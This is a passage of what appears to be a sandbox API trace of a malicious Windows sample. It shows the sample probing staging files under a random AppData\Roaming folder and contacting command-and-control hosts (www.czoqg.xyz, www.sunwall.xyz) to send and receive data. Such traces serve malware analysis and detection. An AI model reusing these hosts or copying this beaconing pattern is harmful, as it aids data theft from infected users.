FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.772] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.772] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.772] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.772] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.772] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.772] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.772] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.772] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.773] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.773] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.773] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.773] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.773] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0225.773] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.773] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.773] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.773] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0225.773] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0225.773] socket (af=2, type=1, protocol=6) returned 0x2688 [0225.773] getaddrinfo (in: pNodeName="www.czoqg.xyz", pServiceName="80", pHints=0x878faf8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x878fb28 | out: ppResult=0x878fb28*=0x862c2c0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884bc0*(sa_family=2, sin_port=0x50, sin_addr="156.251.18.25"), ai_next=0x0)) returned 0 [0225.775] connect (s=0x2688, name=0x8884bc0*(sa_family=2, sin_port=0x50, sin_addr="156.251.18.25"), namelen=16) returned -1 [0246.800] closesocket (s=0x2688) returned 0 [0246.801] Sleep (dwMilliseconds=0x7d0) [0246.802] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.802] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.803] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0246.803] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0246.803] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.803] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.803] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0246.803] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0246.803] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.803] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.803] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0246.803] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0246.804] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.804] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.804] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0246.804] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0246.804] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.804] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.804] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0246.804] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0246.804] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.804] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.805] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0246.805] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0246.805] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.805] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.805] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0246.805] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0246.805] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.805] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.805] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0246.805] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0246.805] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.805] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.805] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0246.805] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0246.805] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.806] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.806] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0246.806] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0246.806] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.806] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.806] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0246.806] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0246.806] socket (af=2, type=1, protocol=6) returned 0x2688 [0246.808] getaddrinfo (in: pNodeName="www.sunwall.xyz", pServiceName="80", pHints=0x878fe98*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x878fec8 | out: ppResult=0x878fec8*=0x862c000*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884fe0*(sa_family=2, sin_port=0x50, sin_addr="162.0.231.155"), ai_next=0x0)) returned 0 [0246.824] connect (s=0x2688, name=0x8884fe0*(sa_family=2, sin_port=0x50, sin_addr="162.0.231.155"), namelen=16) returned 0 [0247.009] send (s=0x2688, buf=0xa10808a*, len=159, flags=0) returned 159 [0247.009] Sleep (dwMilliseconds=0x1f4) [0247.011] setsockopt (s=0x2688, level=65535, optname=4102, optval="¸\x0b", optlen=4) returned 0 [0247.011] recv (in: s=0x2688, buf=0x100f7440, len=2048000, flags=0 | out: buf=0x100f7440*) returned 457 [0248.768] recv (in: s=0x2688, buf=0x100f7609, len=2047543, flags=0 | out: buf=0x100f7609) returned 0 [0248.772] closesocket (s=0x2688) returned 0 [0278.377] Sleep (dwMilliseconds=0x7d0) [0278.509] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0278.510] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0278.511] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0278.511] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892bbb0) returned 1 [0278.511] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0278.511] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0278.511] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0278.511] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0278.511] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0278.511] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: 